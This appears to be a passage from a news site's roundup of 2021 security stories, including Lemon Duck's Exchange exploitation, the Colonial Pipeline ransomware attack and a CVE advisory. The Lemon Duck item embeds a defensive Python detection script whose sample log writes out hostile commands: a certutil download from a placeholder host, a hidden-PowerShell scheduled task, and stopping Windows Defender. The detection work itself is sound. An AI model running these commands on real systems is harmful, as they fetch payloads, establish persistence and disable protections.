More stories

  • Amazon seized, destroyed two million fake products sent to warehouses in 2020

    Amazon’s crusade against counterfeit product sellers on the firm’s platform continues with two million products seized and destroyed in 2020. 

    The e-commerce giant, known for shopping events such as Prime Day, allows third-party sellers across the globe to tout their wares on the Amazon platform. However, it takes only a brief glance at some products to know there are issues. Fake, counterfeit products, poor quality, misleading photos, and more are all noted in buyer reviews, and there are vast numbers of counterfeit operations that Amazon is attempting to detect and remove.

    While some sellers abuse the platform in colorful ways — such as the case of an Instagram influencer who was shut down after allegedly selling dupes with pictures of generic products in the marketplace — others continue to trade without detection. However, Amazon wants to bring “counterfeit to zero” on the platform, and to benchmark the firm’s progress it has released its first Brand Protection Report (.PDF) to the public.

    According to the report, which documents anti-counterfeit activities during 2020, there have been “increased attempts by bad actors to commit fraud and offer counterfeit products,” leading to the seizure of millions of products sent to fulfillment centers, which were then destroyed. “Amazon destroyed those products to prevent them from being resold elsewhere in the supply chain,” the company says.

    The e-commerce giant added that over 10 billion “suspect” listings were blocked before being published, and over six million attempts to create seller accounts suspected of being involved in counterfeit operations were prevented. When it comes to brands being impersonated by counterfeit sellers, Amazon says that less than 0.01% of products sold received an allegation from a customer of being fake, and in these cases over 7,000 SMBs were connected via Amazon’s Counterfeit Crimes Unit to legal teams in the US and Europe. Over $700 million was invested in 2020 to combat counterfeit product operations.

    “Amazon continues to innovate on its robust proactive controls and powerful tools for brands, and won’t rest until there are zero counterfeits in its store,” Amazon commented. “However, this is an escalating battle with criminals that continue to look for ways to sell counterfeits, and the only way to permanently stop these counterfeiters is to hold them accountable through the court system and criminal prosecution.”

    Another problem that likely gives Amazon a headache is the custom of unscrupulous sellers who pay customers to leave five-star reviews. A data leak earlier this month implicated approximately 200,000 individuals in a review scam — potentially originating from China — in which sellers ‘refund’ a product’s price once a glowing review is left on the item’s Amazon listing. In response, the company said, “we suspend, ban, and take legal action against those who violate [community and review] policies.”

    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0

  • Lemon Duck hacking group adopts Microsoft Exchange Server vulnerabilities in new attacks

    Researchers have explored the latest activities of the Lemon Duck hacking group, including the leverage of Microsoft Exchange Server vulnerabilities and the use of decoy top-level domains. 

    The active exploitation of zero-day Microsoft Exchange Server vulnerabilities in the wild was a security disaster for thousands of organizations. Four critical flaws, dubbed ProxyLogon, impact on-prem Microsoft Exchange Server 2013, 2016, and 2010. Patches, vulnerability detection tools, and mitigation instructions were made available in March, but it is still estimated that up to 60,000 organizations may have been compromised. Exploit code, too, is now available, and at least 10 advanced persistent threat (APT) groups have adopted the flaws in attacks this year.

    In late March, Microsoft said the Lemon Duck botnet had been observed exploiting vulnerable servers and using the systems to mine for cryptocurrency. Now, researchers from Cisco Talos have provided a deep dive into the cyberattackers’ current tactics. Lemon Duck operators are incorporating new tools to “maximize the effectiveness of their campaigns” by targeting the high-severity vulnerabilities in Microsoft Exchange Server, and telemetry data on DNS queries to Lemon Duck domains indicates that campaign activity spiked in April.

    The majority of queries came from the US, followed by Europe and South East Asia. A substantial spike in queries to one Lemon Duck domain was also noted in India.

    Lemon Duck operators use automated tools to scan, detect, and exploit servers before loading payloads such as Cobalt Strike DNS beacons and web shells, leading to the execution of cryptocurrency mining software and additional malware. The malware and associated PowerShell scripts will also attempt to remove antivirus products offered by vendors such as ESET and Kaspersky, and will stop any services — including Windows Update and Windows Defender — that could hamper an infection attempt. Scheduled tasks are created to maintain persistence, and in recent campaigns the CertUtil command-line program is used to download two new PowerShell scripts that are tasked with removing AV products, creating persistence routines, and downloading a variant of the XMRig cryptocurrency miner. Signatures of competing cryptocurrency miners, too, are hardcoded into a “killer” module for deletion.

    SMBGhost and EternalBlue have been used in past campaigns, but as the use of Microsoft Exchange Server flaws shows, the group’s tactics are constantly changing to stay ahead of the curve. Lemon Duck has also been creating decoy top-level domains (TLDs) for China, Japan, and South Korea to try to obfuscate command-and-control (C2) infrastructure. “Considering these ccTLDs are most commonly used for websites in their respective countries and languages, it is also interesting that they were used, rather than more generic and globally used TLDs such as ‘.com’ or ‘.net’,” Cisco Talos notes. “This may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments.” Overlaps between the Lemon Duck botnet and Beapy/Pcastle cryptocurrency malware have also been observed.

    “The use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments,” the researchers say. “New TTPs consistent with those reportedly related to widespread exploitation of high-profile Microsoft Exchange software vulnerabilities, and additional host-based evidence suggest that this threat actor is also now showing a specific interest in targeting Exchange Servers as they attempt to compromise additional systems and maintain and/or increase the number of systems within the Lemon Duck botnet.”
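    The host-side tradecraft described above (CertUtil used as a downloader, scheduled tasks registered for persistence, and the stopping of the Windows Update and Windows Defender services) is what a defender would look for in endpoint process-creation telemetry. The following is an added example written for this page; it is not code from the article or from Cisco Talos. The `key=value|key=value` record format, the hostnames, the rule regular expressions and the `example.invalid` placeholder are all constructed for the illustration.

```python
"""Detection helper for the Lemon Duck host behaviours named in the article.

Added example, not code from the article or from Cisco Talos. It scans
constructed process-creation records for three behaviours: CertUtil used
as a downloader, a scheduled task being created, and stop actions against
the Windows Update (wuauserv) or Windows Defender (WinDefend) services.
The record format and the regular expressions are this example's own.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    host: str
    command_line: str


# Each rule is (name, regex). Regexes run over the lowercased command line.
RULES = [
    # certutil fetching a file over HTTP(S) via its URL-cache switch
    ("certutil_download",
     re.compile(r"certutil(?:\.exe)?\b.*[-/]urlcache\b.*https?://")),
    # a new scheduled task being registered
    ("schtasks_persistence",
     re.compile(r"schtasks(?:\.exe)?\b.*\s/create\b")),
    # sc / net / Stop-Service aimed at Windows Defender or Windows Update
    ("defender_or_update_service_stop",
     re.compile(
         r"(?:^|[\s\\])sc(?:\.exe)?\s+(?:stop|config)\s+(?:windefend|wuauserv)\b"
         r"|(?:^|[\s\\])net(?:\.exe)?\s+stop\s+\"?(?:windefend|wuauserv|windows defender)"
         r"|stop-service\b.*\b(?:windefend|wuauserv)\b")),
]


def parse_record(line):
    """Parse one 'key=value|key=value' record (a constructed log format)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def scan(lines):
    """Return a Finding for every (record, rule) pair that matches."""
    findings = []
    for line in lines:
        record = parse_record(line)
        cmd = record.get("cmd", "")
        lowered = cmd.lower()
        for name, regex in RULES:
            if regex.search(lowered):
                findings.append(Finding(name, record.get("host", "?"), cmd))
    return findings


def hosts_hitting_multiple_rules(findings, min_rules=2):
    """Hosts that trip at least min_rules distinct rules: the chain of
    download, persistence and AV tampering on one host is the stronger signal."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.rule)
    return sorted(h for h, rules in by_host.items() if len(rules) >= min_rules)


# Constructed sample records; example.invalid is a reserved placeholder name.
SAMPLE_LOG = [
    "host=WS01|user=svc|cmd=C:\\Windows\\System32\\certutil.exe -urlcache -split -f http://example.invalid/update.ps1 C:\\Users\\Public\\update.ps1",
    'host=WS01|user=svc|cmd=schtasks.exe /create /sc minute /mo 30 /tn Updater /tr "powershell -w hidden -f C:\\Users\\Public\\update.ps1"',
    "host=WS01|user=svc|cmd=sc.exe stop WinDefend",
    "host=WS02|user=bob|cmd=net stop wuauserv",
    "host=WS03|user=alice|cmd=certutil.exe -verify C:\\certs\\root.cer",
    "host=WS03|user=alice|cmd=schtasks.exe /query /tn Backup",
]


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(f"[{hit.rule}] {hit.host}: {hit.command_line}")
    print("hosts with multiple rule hits:", hosts_hitting_multiple_rules(hits))
```

    Run as a script it prints the four hits and names WS01 as the only host that trips more than one rule. In practice the records would come from Sysmon event ID 1 or an EDR’s process-creation feed, and the multi-rule host filter is the triage cue: any single rule here can fire on legitimate administration, whereas download, task creation and Defender tampering on the same host within a short window is the pattern the article describes.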

  • Pipeline ransomware attack: US invokes emergency transport rules to keep fuel flowing

    The US Department of Transportation (USDOT) has invoked emergency powers in response to the Colonial Pipeline ransomware attack in order to make it easier to transport fuel by road. The ransomware attack, disclosed late last week, impacted the pipeline company, which is responsible for supplying 45% of the East Coast’s fuel, including gasoline, diesel, jet fuel, home-heating oil, and fuel for the US military.

    Colonial said it is developing a system restart plan and said that while its mainlines remain offline, some smaller lateral lines between terminals and delivery points are now operational. “Quickly after learning of the attack, Colonial proactively took certain systems offline to contain the threat. These actions temporarily halted all pipeline operations and affected some of our IT systems, which we are actively in the process of restoring,” the company said.

    In the meantime, the USDOT’s Federal Motor Carrier Safety Administration (FMCSA) has issued a Regional Emergency Declaration, which grants temporary exemptions from laws restricting road transport of fuel and allows drivers to work for longer. The exemptions apply to vehicles transporting gasoline, diesel, jet fuel and other refined petroleum products to Alabama, Arkansas, District of Columbia, Delaware, Florida, Georgia, Kentucky, Louisiana, Maryland, Mississippi, New Jersey, New York, North Carolina, Pennsylvania, South Carolina, Tennessee, Texas, and Virginia.

    “Such emergency is in response to the unanticipated shutdown of the Colonial pipeline system due to network issues that affect the supply of gasoline, diesel, jet fuel, and other refined petroleum products throughout the affected states,” FMCSA said in a statement.

    Cybersecurity experts told Reuters today that the ransomware group DarkSide is suspected to have carried out the attack on Colonial Pipeline. DarkSide runs a ransomware-as-a-service business that other cybercrime groups can rent. It has been active since mid-2020 and, although a decryptor was released in January, security firm Cybereason noted that the group recently released DarkSide 2.0. The group is known for encrypting, as well as stealing, some data and using the threat of its exposure on the internet as leverage for the victim to pay ransoms.

    FMCSA’s exemption is aimed at providing commercial tanker operators regulatory relief while directly supporting emergency efforts to patch up fuel supply shortages “due to the shutdown, partial shutdown, and/or manual operation of the Colonial pipeline system”.

    The shutdown of Colonial Pipeline might impact fuel prices depending on the length of the disruption. Gaurav Sharma, an independent oil market analyst, told the BBC that a lot of fuel is banking up at Texas refineries. “Unless they sort it out by Tuesday, they’re in big trouble,” said Sharma. “The first areas to be impacted would be Atlanta and Tennessee, then the domino effect goes up to New York.”

    Colonial Pipeline confirmed on Sunday it was the victim of ransomware and said it had engaged an external cybersecurity firm to assist with its recovery effort.

  • Parliamentary Services pulled MDM system offline causing March APH outage

    Image: Asha Barbaschow/ZDNet
    The Australian Department of Parliamentary Services has said its March outage was a result of a “deliberate choice” to shut down its mobile device management (MDM) system after it saw an attempted intrusion on the parliamentary network.

    “The attack did not cause an outage of the DPS systems. DPS shut down the MDM system. This action was taken to protect system security while investigation and remediation were undertaken,” DPS said in response to Senate Estimates Questions on Notice. “To restore services, DPS brought forward the rollout of an advanced mobile services solution that replaced the legacy MDM. The new solution provides greater security and functionality for mobile devices. This rollout was a complex activity and extended the outage experienced by users.”

    Nevertheless, DPS also said the legacy MDM system was still being used in a limited capacity. “DPS took two paths to restore services to PCN mobile devices. For some users it was possible to restore services using the legacy MDM in a limited capacity,” it said. “These users were utilising a component of the legacy MDM that did not contain vulnerabilities.”

    It added that the MDM replacement had been piloted for three months leading up to the incident, which is why the introduction of the planned replacement could be brought forward. The department added it had seen no evidence of any email accounts being compromised due to the attack, and that the attack had nothing to do with the recent Exchange vulnerabilities.

    DPS said the Senate President would provide further information and “material not appropriately disclosed in the public domain” to the Senate Appropriations, Staffing and Security Committee. In response to another question asking DPS to list all outages impacting connectivity and email from the 2019-20 fiscal year to the present, the department said answering was not appropriate.

    Last month, ASIO Director-General Mike Burgess said he was not concerned by the outage. “As the director of security, I’m not concerned, by what I’ve seen,” he said. “From my point of view of, ‘Is espionage or cyber espionage being occurred?’ I’m not concerned by that incident. Of course, in the broad, any network connected to the internet is subject to that frequently and the levels of cyber espionage attempts in this country are pretty high, so I remain concerned about that and through the actions of others, the [Australian Cyber Security Centre] that is dealing with the terms of that outage, I am not concerned.”

  • User 'opt-in' rate for tracking across iOS sitting at 13% globally

    Image: Flurry Analytics
    Apple’s app tracking transparency tool, which lets users decide whether they agree to their data being tracked, began rolling out as part of iOS 14.5 last month. The feature requires apps to get users’ permission before tracking their data across other companies’ apps or websites for advertising purposes. When asked by users not to track their data, apps will also have to refrain from sharing information with data brokers. But when given the choice, many users are denying permission for apps to gather tracking data.

    In a report from Verizon Media-owned Flurry Analytics, only 13% of global iOS users had allowed apps to track them by the second week of the feature being enabled. As first spotted by Apple Insider, only around 5% of daily users in the United States were allowing tracking by week two. The Flurry report was compiled from aggregated insights across 2 billion mobile devices. It updates daily, and ZDNet last accessed the data on Monday, 10 May 2021 at 9:30am AEST. It also found that around 5% of iOS users have “restricted” app tracking, meaning apps cannot ask those users to be tracked. This figure is 3% in the US.

    If users select “Ask app not to track”, the app developer won’t be given access to the device’s advertising identifier, which is often used to collect advertising data, and apps that continue to track users who have opted out run the risk of being evicted from the App Store altogether.

  • Ransomware just got very real. And it's likely to get worse

    There’s just been another ransomware attack, but this one could have more significant consequences than the many that have come before.

    Late last week, Colonial Pipeline, which accounts for 45% of the US East Coast’s fuel, was forced to shut down its operations due to a ransomware attack against its systems. Even President Biden was briefed on the incident; it doesn’t get much more high profile than that.

    So will such a significant incident lead to changes in how ransomware is tackled? Possibly, but it’s worth remembering that there have been plenty of damaging and high-profile ransomware attacks across both the US and elsewhere without police or governments coming up with a way of tackling these gangs. That’s largely because the ransomware problem is actually a knotty set of interconnected problems, all of which defy easy solutions.

    Certainly many companies need to take cybersecurity more seriously, and vendors need to focus more on selling software that is secure, and not just rushing it out to customers and (maybe) fixing it later. But forcing companies to spend money on cybersecurity with no obvious return is hard; obliging software companies to fix every fault before they ship their software would bring the industry to a halt.

    Persuading police to take these cases seriously is another problem. Few forces have the expertise to tackle this sort of complicated investigation and, even if they did, tracking down the culprits is hard – and securing a conviction all but impossible. Many of these gangs operate from jurisdictions (such as Russia) that are very unlikely to hand over suspects for trial elsewhere. And every time a victim reluctantly pays the gangs, they are making the gangs stronger and able to take on even more ambitious attacks, even against organisations that have invested in security.

    But the bigger issue is that, as we connect more and more systems to the internet, the real world becomes more at risk from threats like this, which until now have only ever been a problem for the online world. That may focus the attention of governments and police a little more. If a ransomware attack means your company loses the sales data held on a few servers, no one – apart from you and your boss – is going to be too upset. But say those servers were running the traffic lights on a busy stretch of road, or running the x-ray machines at the local hospital – then the attack has a real-world impact.

    The growth of interest in smart cities is one example of how this threat could evolve. The idea behind smart cities is that by using data better we can run cities more effectively and efficiently. In practice that means using all manner of sensors and Internet of Things devices to collect information and automate processes. But unless this is done with security in mind, it means that when the technology goes wrong, we could have big problems. As the UK’s cybersecurity agency the NCSC points out: “While smart cities offer significant benefits to citizens, they are also potential targets for cyberattacks due to the critical functions they provide and sensitive data they process, often in large volumes. The compromise of a single system in a smart city could potentially have a negative impact across the network, if badly designed.” Any sort of security threat to smart cities could be a problem, but ransomware seems to be the leading candidate for causing chaos right now.

    So will anything really change any time soon? Well, having your activities brought to the attention of the President of the United States is never a good idea, even if ransomware gangs have themselves courted publicity for their attacks in the past as a way of putting pressure on their victims. Such a high-profile incident might put a bit of momentum behind efforts to tackle the problem. If more funds are made available to improve the security of creaking but vital infrastructure, that will be a step in the right direction. Making it harder or even banning the payment of ransoms in this context would certainly bring short-term pain for victims but may in the longer term be a way of reducing attacks, too.

    Of all the complicated problems that have allowed ransomware to flourish, it could be that the geopolitical challenge is one of the toughest to overcome. Sanctions and indictments have done little so far to stop the flood of attacks. But if the nations that still allow these gangs to operate could be persuaded that it’s no longer in their interests to let them do so, that could change the situation hugely. Still, for now it’s hard to see that the threat of ransomware is going to go away any time soon. Even worse, as we put computers in charge of more of the real world around us, the problem is only likely to get worse.

    ZDNET’S MONDAY MORNING OPENER: The Monday Morning Opener is our opening salvo for the week in tech. Since we run a global site, this editorial publishes on Monday at 8:00am AEST in Sydney, Australia, which is 6:00pm Eastern Time on Sunday in the US. It is written by a member of ZDNet’s global editorial board, which is comprised of our lead editors across Asia, Australia, Europe, and North America.

  • Colonial Pipeline cyberattack shuts down pipeline that supplies 45% of East Coast's fuel

    Colonial Pipeline, which accounts for 45% of the East Coast’s fuel, said it has shut down its operations due to a cyberattack. The attack highlights how ransomware and other cyberattacks are increasingly a threat to real-world infrastructure. The company delivers refined petroleum products such as gasoline, diesel, jet fuel, home heating oil and fuel for the U.S. Military.

    In a statement, Colonial Pipeline said:

    “On May 7, the Colonial Pipeline Company learned it was the victim of a cybersecurity attack. In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations, and affected some of our IT systems. Upon learning of the issue, a leading, third-party cybersecurity firm was engaged, and they have already launched an investigation into the nature and scope of this incident, which is ongoing. We have contacted law enforcement and other federal agencies. Colonial Pipeline is taking steps to understand and resolve this issue. At this time, our primary focus is the safe and efficient restoration of our service and our efforts to return to normal operation. This process is already underway, and we are working diligently to address this matter and to minimize disruption to our customers and those who rely on Colonial Pipeline.”

    Here’s a look at the Colonial Pipeline system affected by the cyberattack.

    Colonial Pipeline’s shutdown, should it continue, may lead to supply shortages since it covers so much territory in the US.

  • Cybersecurity warning: Russian hackers are targeting these vulnerabilities, so patch now

    Russian cyber attacks are being deployed with new techniques – including exploiting vulnerabilities like the recent Microsoft Exchange zero-days – as its hackers continue to target governments, organisations and energy providers around the world.

    A joint advisory by the US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), the FBI and the National Security Agency (NSA), as well as the UK National Cyber Security Centre (NCSC), looks to warn organisations about updated Tactics, Techniques and Procedures (TTPs) used by Russia’s foreign intelligence service, the SVR – a group also known by cybersecurity researchers as APT29, Cozy Bear, and The Dukes. It comes after cybersecurity agencies in the US and the UK attributed the SolarWinds attack to Russia’s civilian foreign intelligence service, as well as several campaigns targeting Covid-19 vaccine developers.

    “The SVR is a technologically sophisticated and highly capable cyber actor. It has developed capabilities to target organisations globally, including in the UK, US, Europe, NATO member states and Russia’s neighbours,” said the alert.

    The advisory warns that Russian cyber attackers have updated their techniques and procedures in an effort to infiltrate networks and avoid detection, especially where organisations have attempted to adjust their defences after previous alerts about cyber threats. This includes the attackers using the open source tool Sliver as a means of maintaining access to compromised networks, and making use of numerous vulnerabilities, including vulnerabilities in Microsoft Exchange. Sliver is an open source red team tool, used by penetration testers when legally and legitimately testing network security, but in this case it is being abused to consolidate access to networks compromised with WellMess and WellMail, custom malware associated with SVR attacks.

    Although the paper warns that this isn’t necessarily a full list, other vulnerabilities used by Russian attackers, all of which have security patches available, include:

    • CVE-2018-13379 – FortiGate
    • CVE-2019-1653 – Cisco router
    • CVE-2019-2725 – Oracle WebLogic Server
    • CVE-2019-9670 – Zimbra
    • CVE-2019-11510 – Pulse Secure
    • CVE-2019-19781 – Citrix
    • CVE-2019-7609 – Kibana
    • CVE-2020-4006 – VMware
    • CVE-2020-5902 – F5 Big-IP
    • CVE-2020-14882 – Oracle WebLogic
    • CVE-2021-21972 – VMware vSphere

    The attackers are also targeting mail servers as part of their attacks, as these are useful staging posts for acquiring administrator rights and the ability to gain further network information and access, be it for a better understanding of the network or a direct effort to steal information.

    But despite the often advanced nature of the attacks, the paper by US and UK cybersecurity authorities says that “following basic cyber security principles will make it harder for even sophisticated actors to compromise target networks”. This includes applying security patches promptly so that no cyber attacker – cyber criminal or nation-state backed operative – can exploit known vulnerabilities as a means of entering or maintaining persistence on the network. Guidance by the NCSC also suggests using multi-factor authentication to help protect the network from attack, particularly if passwords have been compromised.